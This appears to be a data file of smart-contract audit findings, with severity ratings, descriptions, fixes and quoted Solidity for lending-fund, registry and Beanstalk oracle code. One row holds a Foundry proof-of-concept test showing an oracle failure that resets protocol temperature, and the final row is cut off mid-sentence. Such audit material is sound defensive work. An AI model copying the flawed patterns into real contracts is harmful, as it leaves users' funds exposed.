Won't Fix,medium,"Each fund is created using either `Funds.create()` or `Funds.createCustom()`. Both enforce a limitation that there can only be one fund per account:\\n```\\nfunction create(\\n uint256 maxLoanDur\\_,\\n uint256 maxFundDur\\_,\\n address arbiter\\_,\\n bool compoundEnabled\\_,\\n uint256 amount\\_\\n) external returns (bytes32 fund) {\\n require(fundOwner[msg.sender].lender != msg.sender || msg.sender == deployer); // Only allow one loan fund per address\\n```\\n\\n```\\nfunction createCustom(\\n uint256 minLoanAmt\\_,\\n uint256 maxLoanAmt\\_,\\n uint256 minLoanDur\\_,\\n uint256 maxLoanDur\\_,\\n uint256 maxFundDur\\_,\\n uint256 liquidationRatio\\_,\\n uint256 interest\\_,\\n uint256 penalty\\_,\\n uint256 fee\\_,\\n address arbiter\\_,\\n bool compoundEnabled\\_,\\n uint256 amount\\_\\n) external returns (bytes32 fund) {\\n require(fundOwner[msg.sender].lender != msg.sender || msg.sender == deployer); // Only allow one loan fund per address\\n```\\n\\nThese functions are the only place where `bools[fund].custom` is set, and there's no way to delete a fund once it exists. This means there's no way for a given account to switch between a custom and non-custom fund.\\nThis could be a problem if, for example, the default parameters change in a way that a user finds unappealing. They may want to switch to using a custom fund but find themselves unable to do so without moving to a new Ethereum account.",Either allow funds to be deleted or allow funds to be switched between custom and non-custom.,,"```\\nfunction create(\\n uint256 maxLoanDur\\_,\\n uint256 maxFundDur\\_,\\n address arbiter\\_,\\n bool compoundEnabled\\_,\\n uint256 amount\\_\\n) external returns (bytes32 fund) {\\n require(fundOwner[msg.sender].lender != msg.sender || msg.sender == deployer); // Only allow one loan fund per address\\n```\\n" +Funds.maxFundDur has no effect if maxLoanDur is set,medium,"`Funds.maxFundDur` specifies the maximum amount of time a fund should be active. It's checked in `request()` to ensure the duration of the loan won't exceed that time, but the check is skipped if `maxLoanDur` is set:\\n```\\nif (maxLoanDur(fund) > 0) {\\n require(loanDur\\_ <= maxLoanDur(fund));\\n} else {\\n require(now + loanDur\\_ <= maxFundDur(fund));\\n}\\n```\\n\\nIf a user sets `maxLoanDur` (the maximum loan duration) to 1 week and sets the `maxFundDur` (timestamp when all loans should be complete) to December 1st, then there can actually be a loan that ends on December 7th.",Check against `maxFundDur` even when `maxLoanDur` is set.,,```\\nif (maxLoanDur(fund) > 0) {\\n require(loanDur\\_ <= maxLoanDur(fund));\\n} else {\\n require(now + loanDur\\_ <= maxFundDur(fund));\\n}\\n```\\n +Funds.update() lets users update fields that may not have any effect,low,"`Funds.update()` allows users to update the following fields which are only used if `bools[fund].custom` is set:\\n`minLoanamt`\\n`maxLoanAmt`\\n`minLoanDur`\\n`interest`\\n`penalty`\\n`fee`\\n`liquidationRatio`\\nIf `bools[fund].custom` is not set, then these changes have no effect. This may be misleading to users.\\n```\\nfunction update(\\n bytes32 fund,\\n uint256 minLoanAmt\\_,\\n uint256 maxLoanAmt\\_,\\n uint256 minLoanDur\\_,\\n uint256 maxLoanDur\\_,\\n uint256 maxFundDur\\_,\\n uint256 interest\\_,\\n uint256 penalty\\_,\\n uint256 fee\\_,\\n uint256 liquidationRatio\\_,\\n address arbiter\\_\\n) external {\\n require(msg.sender == lender(fund));\\n funds[fund].minLoanAmt = minLoanAmt\\_;\\n funds[fund].maxLoanAmt = maxLoanAmt\\_;\\n funds[fund].minLoanDur = minLoanDur\\_;\\n funds[fund].maxLoanDur = maxLoanDur\\_;\\n funds[fund].maxFundDur = maxFundDur\\_;\\n funds[fund].interest = interest\\_;\\n funds[fund].penalty = penalty\\_;\\n funds[fund].fee = fee\\_;\\n funds[fund].liquidationRatio = liquidationRatio\\_;\\n funds[fund].arbiter = arbiter\\_;\\n}\\n```\\n",Resolution\\nThis is fixed in AtomicLoans/atomicloans-eth-contracts#67.\\nThis could be addressed by creating two update functions: one for custom funds and one for non-custom funds. Only the update for custom funds would allow setting these values.,,"```\\nfunction update(\\n bytes32 fund,\\n uint256 minLoanAmt\\_,\\n uint256 maxLoanAmt\\_,\\n uint256 minLoanDur\\_,\\n uint256 maxLoanDur\\_,\\n uint256 maxFundDur\\_,\\n uint256 interest\\_,\\n uint256 penalty\\_,\\n uint256 fee\\_,\\n uint256 liquidationRatio\\_,\\n address arbiter\\_\\n) external {\\n require(msg.sender == lender(fund));\\n funds[fund].minLoanAmt = minLoanAmt\\_;\\n funds[fund].maxLoanAmt = maxLoanAmt\\_;\\n funds[fund].minLoanDur = minLoanDur\\_;\\n funds[fund].maxLoanDur = maxLoanDur\\_;\\n funds[fund].maxFundDur = maxFundDur\\_;\\n funds[fund].interest = interest\\_;\\n funds[fund].penalty = penalty\\_;\\n funds[fund].fee = fee\\_;\\n funds[fund].liquidationRatio = liquidationRatio\\_;\\n funds[fund].arbiter = arbiter\\_;\\n}\\n```\\n" +Ingress.setContractAddress() can cause duplicate entries in contractKeys,medium,"`setContractAddress()` checks `ContractDetails` existence by inspecting `contractAddress`. A `contractAddress` of `0` means that the contract does not already exist, and its name must be added to contractKeys:\\n```\\nfunction setContractAddress(bytes32 name, address addr) public returns (bool) {\\n require(name > 0x0000000000000000000000000000000000000000000000000000000000000000, ""Contract name must not be empty."");\\n require(isAuthorized(msg.sender), ""Not authorized to update contract registry."");\\n\\n ContractDetails memory info = registry[name];\\n // create info if it doesn't exist in the registry\\n if (info.contractAddress == address(0)) {\\n info = ContractDetails({\\n owner: msg.sender,\\n contractAddress: addr\\n });\\n\\n // Update registry indexing\\n contractKeys.push(name);\\n } else {\\n info.contractAddress = addr;\\n }\\n // update record in the registry\\n registry[name] = info;\\n\\n emit RegistryUpdated(addr,name);\\n\\n return true;\\n}\\n```\\n\\nIf, however, a contract is actually added with the address `0`, which is currently allowed in the code, then the contract does already exists, and adding the name to `contractKeys` again will result in a duplicate.\\nMitigation\\nAn admin can call `removeContract` repeatedly with the same name to remove multiple duplicate entries.",Resolution\\nThis is fixed in PegaSysEng/[email protected]faff726.\\nEither disallow a contract address of `0` or check for existence via the `owner` field instead (which can never be 0).,,"```\\nfunction setContractAddress(bytes32 name, address addr) public returns (bool) {\\n require(name > 0x0000000000000000000000000000000000000000000000000000000000000000, ""Contract name must not be empty."");\\n require(isAuthorized(msg.sender), ""Not authorized to update contract registry."");\\n\\n ContractDetails memory info = registry[name];\\n // create info if it doesn't exist in the registry\\n if (info.contractAddress == address(0)) {\\n info = ContractDetails({\\n owner: msg.sender,\\n contractAddress: addr\\n });\\n\\n // Update registry indexing\\n contractKeys.push(name);\\n } else {\\n info.contractAddress = addr;\\n }\\n // update record in the registry\\n registry[name] = info;\\n\\n emit RegistryUpdated(addr,name);\\n\\n return true;\\n}\\n```\\n" +Use specific contract types instead of address where possible,low,"For clarity and to get more out of the Solidity type checker, it's generally preferred to use a specific contract type for variables rather than the generic `address`.\\n`AccountRules.ingressContractAddress` could instead be `AccountRules.ingressContract` and use the type IngressContract:\\n```\\naddress private ingressContractAddress;\\n```\\n\\n```\\nAccountIngress ingressContract = AccountIngress(ingressContractAddress);\\n```\\n\\n```\\nconstructor (address ingressAddress) public {\\n```\\n\\nThis same pattern is found in NodeRules:\\n```\\naddress private nodeIngressContractAddress;\\n```\\n","Where possible, use a specific contract type rather than `address`.",,```\\naddress private ingressContractAddress;\\n```\\n +Ingress should use a set,low,"The `AdminList`, `AccountRulesList`, and `NodeRulesList` contracts have been recently rewritten to use a set. `Ingress` has the semantics of a set but has not been written the same way.\\nThis leads to some inefficiencies. In particular, `Ingress.removeContract` is an O(n) operation:\\n```\\nfor (uint i = 0; i < contractKeys.length; i++) {\\n // Delete the key from the array + mapping if it is present\\n if (contractKeys[i] == name) {\\n delete registry[contractKeys[i]];\\n contractKeys[i] = contractKeys[contractKeys.length - 1];\\n delete contractKeys[contractKeys.length - 1];\\n contractKeys.length--;\\n```\\n",Use the same set implementation for Ingress: an array of `ContractDetails` and a mapping of names to indexes in that array.,,```\\nfor (uint i = 0; i < contractKeys.length; i++) {\\n // Delete the key from the array + mapping if it is present\\n if (contractKeys[i] == name) {\\n delete registry[contractKeys[i]];\\n contractKeys[i] = contractKeys[contractKeys.length - 1];\\n delete contractKeys[contractKeys.length - 1];\\n contractKeys.length--;\\n```\\n +ContractDetails.owner is never read,low,"The `ContractDetails` struct used by `Ingress` contracts has an `owner` field that is written to, but it is never read.\\n```\\nstruct ContractDetails {\\n address owner;\\n address contractAddress;\\n}\\n\\nmapping(bytes32 => ContractDetails) registry;\\n```\\n","Resolution\\nThis is fixed in PegaSysEng/[email protected]d3f505e.\\nIf `owner` is not (yet) needed, the `ContractDetails` struct should be removed altogether and the type of `Ingress.registry` should change to `mapping(bytes32 => address)`",,```\\nstruct ContractDetails {\\n address owner;\\n address contractAddress;\\n}\\n\\nmapping(bytes32 => ContractDetails) registry;\\n```\\n +[M-2] Failure in Maintaining Gauge Points,medium,"The defaultGaugePointFunction in the smart contract does not explicitly handle the scenario where the percentage of the Base Deposited Value (BDV) equals the optimal percentage (optimalPercentDepositedBdv), resulting in an unintended reduction of gauge points to 0 instead of maintaining their current value.\\nThe testnew_GaugePointAdjustment() test demonstrated this flaw by providing inputs where currentGaugePoints = 1189, optimalPercentDepositedBdv = 64, and percentOfDepositedBdv = 64, expecting newGaugePoints to equal currentGaugePoints. However, the outcome was newGaugePoints = 0, indicating an unexpected reduction to zero.\\n```\\nfunction testnew_GaugePointAdjustment() public {\\n uint256 currentGaugePoints = 1189; \\n uint256 optimalPercentDepositedBdv = 64; \\n uint256 percentOfDepositedBdv = 64; \\n\\n uint256 newGaugePoints = gaugePointFacet.defaultGaugePointFunction(\\n currentGaugePoints,\\n optimalPercentDepositedBdv,\\n percentOfDepositedBdv\\n );\\n\\n assertTrue(newGaugePoints <= MAX_GAUGE_POINTS, ""New gauge points exceed the maximum allowed"");\\n assertEq(newGaugePoints, currentGaugePoints, ""Gauge points adjustment does not match expected outcome"");\\n}\\n```\\n","Implement Explicit Returns: Ensure the defaultGaugePointFunction has an explicit return for the case where gauge points should not be adjusted. This can be achieved by adding a final return statement that simply returns currentGaugePoints if neither condition for incrementing nor decrementing is met, as shown below:\\n```\\nelse {\\n return currentGaugePoints; \\n}\\n```\\n","This behavior can lead to an undesired decrease in incentives for contract participants, potentially affecting participation and reward accumulation within the contract's ecosystem. Users may lose gauge points and, consequently, rewards due to a technical flaw rather than their actions.","```\\nfunction testnew_GaugePointAdjustment() public {\\n uint256 currentGaugePoints = 1189; \\n uint256 optimalPercentDepositedBdv = 64; \\n uint256 percentOfDepositedBdv = 64; \\n\\n uint256 newGaugePoints = gaugePointFacet.defaultGaugePointFunction(\\n currentGaugePoints,\\n optimalPercentDepositedBdv,\\n percentOfDepositedBdv\\n );\\n\\n assertTrue(newGaugePoints <= MAX_GAUGE_POINTS, ""New gauge points exceed the maximum allowed"");\\n assertEq(newGaugePoints, currentGaugePoints, ""Gauge points adjustment does not match expected outcome"");\\n}\\n```\\n" +Silo is not compatible with Fee-on-transfer or rebasing tokens,medium,"According to the documentation there are certain conditions that need to be met for a token to be whitelisted:\\n```\\nAdditional tokens may be added to the Deposit Whitelist via Beanstalk governance. In order for a token to be added to the Deposit Whitelist, Beanstalk requires:\\n1. The token address;\\n2. A function to calculate the Bean Denominated Value (BDV) of the token (see Section 14.2 of the whitepaper for complete formulas); and\\n3. The number of Stalk and Seeds per BDV received upon Deposit.\\n```\\n\\nThus if the community proposes any kind of Fee-on-Transfer or rebasing tokens like (PAXG or stETH) and the Beanstalk governance approves it, then the protocol needs to integrate them into the system. But as it is now the system is definitely not compatible with such tokens.\\n`deposit`, `depositWithBDV`, `addDepositToAccount`, `removeDepositFromAccount` and any other `silo` accounting related functions perform operations using inputed/recorded amounts. They don't query the existing balance of tokens before or after receiving/sending in order to properly account for tokens that shift balance when received (FoT) or shift balance over time (rebasing).",Clearly state in the docs that weird tokens won't be implemented via Governance Vote or adjust the code to check the `token.balanceOf()` before and after doing any operation related to the `silo`.,Likelyhood - low/medium - At the moment of writing lido has over 31% of the ETH staked which makes `stETH` a very popular token. There's a strong chance that stakeholder would want to have `stETH` inside the silo.\\nOverall severity is medium.,"```\\nAdditional tokens may be added to the Deposit Whitelist via Beanstalk governance. In order for a token to be added to the Deposit Whitelist, Beanstalk requires:\\n1. The token address;\\n2. A function to calculate the Bean Denominated Value (BDV) of the token (see Section 14.2 of the whitepaper for complete formulas); and\\n3. The number of Stalk and Seeds per BDV received upon Deposit.\\n```\\n" +`removeWhitelistStatus` function Ignores updating `milestoneSeason` variable,medium,"The issue in the `LibWhitelistedTokens:removeWhitelistStatus` function is that it removes the Whitelist status of a token without considering the impact on other related variables, such as the `milestoneSeason` variable.\\n`milestoneSeason` Is used in many functions for checking whether a token is whitelisted or not i.e.\\n```\\n require(s.ss[token].milestoneSeason == 0, ""Whitelist: Token already whitelisted"");\\n```\\n\\nIf the milestoneSeason variable is not updated or cleared when removing the Whitelist status, it may lead to incorrect behavior in subsequent checks or operations that rely on this variable.","To address this issue, ensure that related variables, such as `milestoneSeason`, are appropriately updated or cleared when removing the Whitelist status of a token. If the `milestoneSeason` variable is no longer relevant after removing the Whitelist status, it should be updated or cleared to maintain data integrity.","`removeWhitelistStatus` function Ignores updating `milestoneSeason` variable\\nRemoving the Whitelist status of a token without updating related variables can lead to inconsistencies in the data stored in the contract. The `milestoneSeason` variable, used for checking whitelist status in many functions, may still hold outdated or incorrect information after removing the status, potentially leading to unexpected behavior or vulnerabilities.","```\\n require(s.ss[token].milestoneSeason == 0, ""Whitelist: Token already whitelisted"");\\n```\\n" +No validation of total supply of unripe beans & Lp in `percentBeansRecapped` & `percentLPRecapped`,low,"`LibUnripe:percentBeansRecapped` & `LibUnripe:percentLPRecapped` functions calculate the percentage of Unripe Beans and Unripe LPs that have been recapitalized, respectively. These percentages are calculated based on the underlying balance of the Unripe Tokens and their total supply. There is no check if the `totalSupply` is zero which is used as division in the calculation.\\nSee the following code for both the functions:\\n```\\n /**\\n * @notice Returns the percentage that Unripe Beans have been recapitalized.\\n */\\n function percentBeansRecapped() internal view returns (uint256 percent) {\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n return s.u[C.UNRIPE_BEAN].balanceOfUnderlying.mul(DECIMALS).div(C.unripeBean().totalSupply());\\n }\\n\\n /**\\n * @notice Returns the percentage that Unripe LP have been recapitalized.\\n */\\n function percentLPRecapped() internal view returns (uint256 percent) {\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n return C.unripeLPPerDollar().mul(s.recapitalized).div(C.unripeLP().totalSupply());\\n }\\n```\\n","To handle this scenario, appropriate checks should be added to ensure that the `totalSupply` of Unripe Beans or LP tokens is non-zero before performing the division operation.","If the `totalSupply` in these two functions becomes zero, the calculation of the percentage of recapitalized Unripe Beans or LP tokens would result in a division by zero error. This is because of the denominator in the calculation. When the total supply is zero, dividing by zero is not defined in Solidity, and the contract would revert with an error.\\nThese functions are used widely across the different contracts at crucial places. So they will effect a lot of functionalities.",```\\n /**\\n * @notice Returns the percentage that Unripe Beans have been recapitalized.\\n */\\n function percentBeansRecapped() internal view returns (uint256 percent) {\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n return s.u[C.UNRIPE_BEAN].balanceOfUnderlying.mul(DECIMALS).div(C.unripeBean().totalSupply());\\n }\\n\\n /**\\n * @notice Returns the percentage that Unripe LP have been recapitalized.\\n */\\n function percentLPRecapped() internal view returns (uint256 percent) {\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n return C.unripeLPPerDollar().mul(s.recapitalized).div(C.unripeLP().totalSupply());\\n }\\n```\\n +Temperature and caseId are incorrectly adjusted when oracle fails,medium,"When user calls `gm` and the call for the chainlink oracle fails, it will return 0 for the `deltaB` value and this will cause a cascade effect, making the calculation of `caseId` = `3` and using the incorrect `caseId` to set up the new temperature on Weather.sol\\n```\\nfunction updateTemperature(int8 bT, uint256 caseId) private {\\n uint256 t = s.w.t;\\n if (bT < 0) {\\n if (t <= uint256(-bT)) {\\n // if (change < 0 && t <= uint32(-change)),\\n // then 0 <= t <= type(int8).max because change is an int8.\\n // Thus, downcasting t to an int8 will not cause overflow.\\n bT = 1 - int8(t);\\n s.w.t = 1;\\n } else {\\n s.w.t = uint32(t - uint256(-bT));\\n }\\n } else {\\n s.w.t = uint32(t + uint256(bT));\\n }\\n\\n emit TemperatureChange(s.season.current, caseId, bT);\\n }\\n```\\n\\nEvery consumer of the temperature on the protocol will be affected like:\\n`LibDibbler.morningTemperature`\\n`LibDibbler.beansToPods`\\n`LibDibbler.remainingPods`\\n`Sun.setSoilAbovePeg`\\n`Sun.stepSun`\\n`FieldFacet.maxTemperature`\\n`FieldFacet.totalSoil`\\n`FieldFacet._totalSoilAndTemperature`\\n`FieldFacet.sowWithMin\\n`gm` function uses the incorrect deltaB(0) to calculate the `caseId` which is then used to set the temperature.\\n```\\n function gm(address account, LibTransfer.To mode) public payable returns (uint256) {\\n int256 deltaB = stepOracle(); // @audit here if oracle failed, we update the season.timestamp and return deltaB zero here\\n uint256 caseId = calcCaseIdandUpdate(deltaB); // @audit caseId will be 3 here if deltaB is zero\\n LibGerminate.endTotalGermination(season, LibWhitelistedTokens.getWhitelistedTokens());\\n LibGauge.stepGauge();\\n stepSun(deltaB, caseId); // @audit wrong deltaB and caseId used here, setting the abovePeg to false and soil to zero\\n }\\n```\\n\\nPrepare the environment to work with Foundry + Updated Mocks https://gist.github.com/h0lydev/fcdb00c797adfdf8e4816031e095fd6c\\nMake sure to have the mainnet forked through Anvil: `anvil --fork-url https://rpc.ankr.com/eth`\\nCreate the `SeasonTemperature.t.sol` file under the folder `foundry` and paste the code below. Then run `forge test --match-contract SeasonTemperatureTest -vv`.\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity =0.7.6;\\npragma abicoder v2;\\n\\nimport { Sun } from ""contracts/beanstalk/sun/SeasonFacet/Sun.sol"";\\nimport { MockSeasonFacet } from ""contracts/mocks/mockFacets/MockSeasonFacet.sol"";\\nimport { MockSiloFacet } from ""contracts/mocks/mockFacets/MockSiloFacet.sol"";\\nimport { MockFieldFacet } from ""contracts/mocks/mockFacets/MockFieldFacet.sol"";\\nimport { MockWhitelistFacet } from ""contracts/mocks/mockFacets/MockWhitelistFacet.sol"";\\nimport {LibWhitelist} from ""contracts/libraries/Silo/LibWhitelist.sol"";\\nimport { Utils } from ""./utils/Utils.sol"";\\nimport ""./utils/TestHelper.sol"";\\nimport ""contracts/libraries/LibSafeMath32.sol"";\\nimport ""contracts/C.sol"";\\n\\ncontract SeasonTemperatureTest is MockSeasonFacet, TestHelper {\\n using SafeMath for uint256;\\n using LibSafeMath32 for uint32;\\n\\n bool oracleFailed;\\n \\n function setUp() public {\\n console.log(""diamondSetup"");\\n vm.createSelectFork('local');\\n oracleFailed = false;\\n setupDiamond();\\n dewhitelistCurvePool();\\n mintUnripeLPToUser1(); \\n mintUnripeBeanToUser1();\\n setOraclePrices(false, 1000e6, 1000e6, 1000e6);\\n _setReservesForWell(1000000e6, 1000e18);\\n \\n // user / tokens\\n mintTokenForUsers();\\n setTokenApprovalForUsers();\\n \\n enableFertilizerAndMintActiveFertilizers();\\n\\n callSunriseForUser1();\\n }\\n\\n\\n //////////// Setup functions ////////////\\n\\n function setTokenApprovalForUsers() internal { \\n approveTokensForUser(deployer);\\n approveTokensForUser(user1);\\n approveTokensForUser(user2);\\n approveTokensForUser(user3);\\n approveTokensForUser(user4);\\n approveTokensForUser(user5);\\n }\\n\\n function mintTokenForUsers() internal { \\n mintWETHtoUser(deployer);\\n mintWETHtoUser(user1);\\n mintWETHtoUser(user2);\\n mintWETHtoUser(user3);\\n mintWETHtoUser(user4);\\n mintWETHtoUser(user5);\\n\\n // mint C.bean() to users\\n C.bean().mint(deployer, 10e6);\\n C.bean().mint(user1, 10e6);\\n C.bean().mint(user2, 10e6);\\n C.bean().mint(user3, 10e6);\\n C.bean().mint(user4, 10e6);\\n C.bean().mint(user5, 10e6);\\n }\\n\\n function approveTokensForUser(address user) prank(user) internal { \\n mockWETH.approve(address(diamond), type(uint256).max);\\n unripeLP.approve(address(diamond), type(uint256).max);\\n unripeBean.approve(address(diamond), type(uint256).max);\\n well.approve(address(diamond), type(uint256).max);\\n C.bean().approve(address(field), type(uint256).max);\\n C.bean().approve(address(field), type(uint256).max);\\n }\\n\\n function dewhitelistCurvePool() public {\\n vm.prank(deployer);\\n whitelist.dewhitelistToken(C.CURVE_BEAN_METAPOOL);\\n }\\n\\n function mintWETHtoUser(address user) prank(user) internal {\\n mockWETH.mint(user, 1000e18);\\n }\\n\\n function mintUnripeLPToUser1() internal { \\n unripeLP.mint(user1, 1000e6);\\n }\\n\\n function mintUnripeBeanToUser1() internal { \\n unripeBean.mint(user1, 1000e6);\\n }\\n\\n function enableFertilizerAndMintActiveFertilizers() internal { \\n // second parameter is the unfertilizedIndex\\n fertilizer.setFertilizerE(true, 10000e6);\\n\\n vm.prank(deployer);\\n fertilizer.addFertilizerOwner(7500, 1e11, 99);\\n\\n vm.prank(deployer);\\n fertilizer.addFertilizerOwner(6200, 1e11, 99);\\n\\n addUnripeTokensToFacet();\\n }\\n\\n function addUnripeTokensToFacet() prank(deployer) internal { \\n unripe.addUnripeToken(C.UNRIPE_BEAN, C.BEAN, bytes32(0));\\n unripe.addUnripeToken(C.UNRIPE_LP, C.BEAN_ETH_WELL, bytes32(0));\\n }\\n\\n function callSunriseForUser1() prank(user1) internal {\\n _ensurePreConditions();\\n _advanceInTime(2 hours);\\n season.sunrise();\\n }\\n\\n function setOraclePrices(bool makeOracleFail, int256 chainlinkPrice, uint256 ethUsdtPrice, uint256 ethUsdcPrice) internal { \\n if (makeOracleFail) { \\n _addEthUsdPriceChainlink(0);\\n oracleFailed = true;\\n } else { \\n oracleFailed = false;\\n _addEthUsdPriceChainlink(chainlinkPrice);\\n _setEthUsdtPrice(ethUsdtPrice);\\n _setEthUsdcPrice(ethUsdcPrice);\\n }\\n }\\n\\n ////////////////////////////////////////// TESTS //////////////////////////////////////////\\n\\n function testWrongCalcId_whenOracleFails() public { \\n _prepareForAbovePeg();\\n _advanceInTime(1 hours);\\n uint256 _snapId = vm.snapshot();\\n \\n // When sunrise succeeds\\n vm.prank(user4);\\n season.sunrise();\\n\\n // Then print results\\n _printProtocolState();\\n assertEq(season.getT(), 5, ""when succeeds t should be 5"");\\n \\n // Then revert it to prepare for the season that will fail\\n vm.revertTo(_snapId);\\n\\n // Prepare for the season that will fail\\n setOraclePrices(true, 0, 0, 0);\\n\\n // When sunrise fails\\n vm.prank(user4);\\n season.sunrise();\\n\\n console.log(""Oracle failed, see results"");\\n _printProtocolState();\\n assertEq(season.getT(), 1, ""when succeeds t should be 1"");\\n\\n }\\n\\n function _printProtocolState() internal { \\n console.log(""-------------- Results --------------"");\\n console.log("""");\\n console.log(""thisSowTime: "", season.thisSowTime());\\n console.log(""lastSowTime: "", season.lastSowTime());\\n console.log(""getUsdTokenPrice: "", season.getUsdTokenPrice());\\n console.log(""getReserve0: "", season.getReserve0());\\n console.log(""getReserve1: "", season.getReserve1());\\n console.log(""getAbovePeg: "", season.getAbovePeg());\\n console.log(""getSoil: "", season.getSoil());\\n console.log(""lastDSoil: "", season.lastDSoil());\\n console.log(""s.w.t: "", season.getT());\\n console.log(""remaining pods: "", field.remainingPods());\\n } \\n\\n function _prepareForAbovePeg() internal { \\n season.mockSetSopWell(address(well));\\n season.captureWellE(address(well)); \\n season.setYieldE(5); // s.w.t\\n setOraclePrices(false, 1000e6, 1000e6, 1000e6);\\n\\n season.setLastSowTimeE(1);\\n season.setNextSowTimeE(10);\\n season.calcCaseIdE(1e18, 1);\\n season.setAbovePegE(true);\\n }\\n\\n ////////////////////////////////////////// HELPERS //////////////////////////////////////////\\n\\n function _ensurePreConditions() internal { \\n assertTrue(season.thisSowTime() == type(uint32).max, ""thisSowTime should be max"");\\n assertTrue(season.lastSowTime() == type(uint32).max, ""thisLastSowTime should be max"");\\n assertEq(season.getIsFarm(), 1, ""isFarm should be 1"");\\n assertEq(season.getUsdTokenPrice(), 1, ""usdTokenPrice should be 1"");\\n assertEq(season.getReserve0(), 1, ""reserve0 should be 1"");\\n assertEq(season.getReserve1(), 1, ""reserve1 should be 1"");\\n assertFalse(season.getAbovePeg(), ""pre - abovePeg should be false"");\\n assertEq(season.getSoil(), 0, ""soil should be == 0"");\\n }\\n}\\n```\\n\\nOutput:\\n```\\n handleRain caseId: 0\\n -------------- Results --------------\\n \\n thisSowTime: 4294967295\\n lastSowTime: 4294967295\\n getUsdTokenPrice: 1\\n getReserve0: 1\\n getReserve1: 1\\n getAbovePeg: false\\n getSoil: 462832752243\\n lastDSoil: 0\\n s.w.t: 5\\n remaining pods: 467461079765\\n\\nhandleRain caseId: 3\\n Oracle failed, see results\\n -------------- Results --------------\\n \\n thisSowTime: 4294967295\\n lastSowTime: 4294967295\\n getUsdTokenPrice: 1\\n getReserve0: 1\\n getReserve1: 1\\n getAbovePeg: false\\n getSoil: 0\\n lastDSoil: 0\\n s.w.t: 1\\n remaining pods: 0\\n\\nSuite result: ok. 1 passed; 0 failed; 0 skipped; finished in 29.45s (3.32ms CPU time)\\n```\\n\\nps: a console.log was added to the `handleRain` function to print the caseId.\\nResult: In a normal scenario the temperature would have remained at the value `5` but in this case was set to `1` and remaining pods/soil are also set to zero when in fact they should not.","It is noticed that the developers have the intention of never reverting the sunrise function to decrease the risk of depeg and breaking the incentive for users calling it. But at the same time, those state variables shouldn't be updated as if the system is working correctly because they will impact the next season as stated in this finding.\\nIt is tricky to propose a simple fix to the problem without impacting the system as a whole. Here are a few ideas that could be used:\\n(Recommended) An effective solution could be store the latest response from chainlink and in case it fails and the timeout(a limit that you can be added to accept a previous response from the oracle) is not reached yet, protocol could use the previous response. Liquity Protocol uses this approach, an example here: https://github.com/liquity/dev/blob/main/packages/contracts/contracts/PriceFeed.sol This solution will be effective for the protocol because the oracle is also called in different places like when minting fertilizers(getMintFertilizerOut), getting the well price(getRatiosAndBeanIndex), and `getConstantProductWell`. As the oracle is used along the protocol in many places, the `latest successful price` would be often up-to-date and within the limit time defined to use the previous price when the chainlink oracle fails.\\nAdditionally, consider handling the errors properly before updating the `deltaB` and `abovePeg` variables, as these disrupt the peg mechanism logic.","The interest rate will be wrongly decreased to 1, compromising the protocol peg mechanism when it needs to be maintained with a high interest rate/ temperature.\\nSow will be calculated with the lowest temperature, also compromising the peg mechanism due to the wrong exchange of Beans -> Sow -> Pods\\nRemaining pods function will return zero and users will have an inaccurate number representing their actual pods.","```\\nfunction updateTemperature(int8 bT, uint256 caseId) private {\\n uint256 t = s.w.t;\\n if (bT < 0) {\\n if (t <= uint256(-bT)) {\\n // if (change < 0 && t <= uint32(-change)),\\n // then 0 <= t <= type(int8).max because change is an int8.\\n // Thus, downcasting t to an int8 will not cause overflow.\\n bT = 1 - int8(t);\\n s.w.t = 1;\\n } else {\\n s.w.t = uint32(t - uint256(-bT));\\n }\\n } else {\\n s.w.t = uint32(t + uint256(bT));\\n }\\n\\n emit TemperatureChange(s.season.current, caseId, bT);\\n }\\n```\\n" +`Chainlink` oracle returns stale price due to `CHAINLINK_TIMEOUT` variable in `LibChainlinkOracle` being set to 4 hours,medium,"The `LibChainlinkOracle` library utilizes a `CHAINLINK_TIMEOUT` constant set to `14400` seconds (4 hours). This duration is four times longer than the `Chainlink` heartbeat that is `3600` seconds (1 hour), potentially introducing a significant delay in recognizing stale or outdated price data.\\nThe `LibChainlinkOracle::checkForInvalidTimestampOrAnswer` function accepts three input arguments: `timestamp`, `answer` and `currentTimestamp` and check if the return `answer` from `Chainlinlink Oracle` or the `timestamp` is invalid:\\n```\\n function checkForInvalidTimestampOrAnswer(\\n uint256 timestamp,\\n int256 answer,\\n uint256 currentTimestamp\\n ) private pure returns (bool) {\\n // Check for an invalid timeStamp that is 0, or in the future\\n if (timestamp == 0 || timestamp > currentTimestamp) return true;\\n // Check if Chainlink's price feed has timed out\\n if (currentTimestamp.sub(timestamp) > CHAINLINK_TIMEOUT) return true;\\n // Check for non-positive price\\n if (answer <= 0) return true;\\n }\\n```\\n\\nThe function also checks if the difference between the `currentTimestamp` and the `timestamp` is greater then `CHAINLINK_TIMEOUT`. The `CHAINLINK_TIMEOUT` is defined to be 4 hours:\\n```\\n uint256 public constant CHAINLINK_TIMEOUT = 14400; // 4 hours: 60 * 60 * 4\\n```\\n","Consider reducing the `CHAINLINK_TIMEOUT` to align more closely with the `Chainlink` heartbeat on Ethereum, enhancing the relevance of the price data.","The `Chainlink` heartbeat indicates the expected frequency of updates from the oracle. The `Chainlink` heartbeat on Ethereum for `Eth/Usd` is `3600` seconds (1 hour).\\nhttps://docs.chain.link/data-feeds/price-feeds/addresses?network=ethereum&page=1&search=0x5f4eC3Df9cbd43714FE2740f5E3616155c5b8419\\nBut the defined `CHAINLINK_TIMEOUT` in the `LibChainlinkOracle` is `14400` seconds (4 hours).\\nA `CHAINLINK_TIMEOUT` that is significantly longer than the heartbeat can lead to scenarios where the `LibChainlinkOracle` library accepts data that may no longer reflect current market conditions. Also, in volatile markets, a 4-hour window leads to accepting outdated prices, increasing the risk of price slippage.","```\\n function checkForInvalidTimestampOrAnswer(\\n uint256 timestamp,\\n int256 answer,\\n uint256 currentTimestamp\\n ) private pure returns (bool) {\\n // Check for an invalid timeStamp that is 0, or in the future\\n if (timestamp == 0 || timestamp > currentTimestamp) return true;\\n // Check if Chainlink's price feed has timed out\\n if (currentTimestamp.sub(timestamp) > CHAINLINK_TIMEOUT) return true;\\n // Check for non-positive price\\n if (answer <= 0) return true;\\n }\\n```\\n" +[M] DOS in LibChainlinkOracle when not considering phaseId,medium,"`LibChainlinkOracle` is not fully compatible with Chainlink's data model due to the lack of support for `phaseId and aggregatorRoundId`. Chainlink's `roundID` is a composite number combining a `phaseID and an 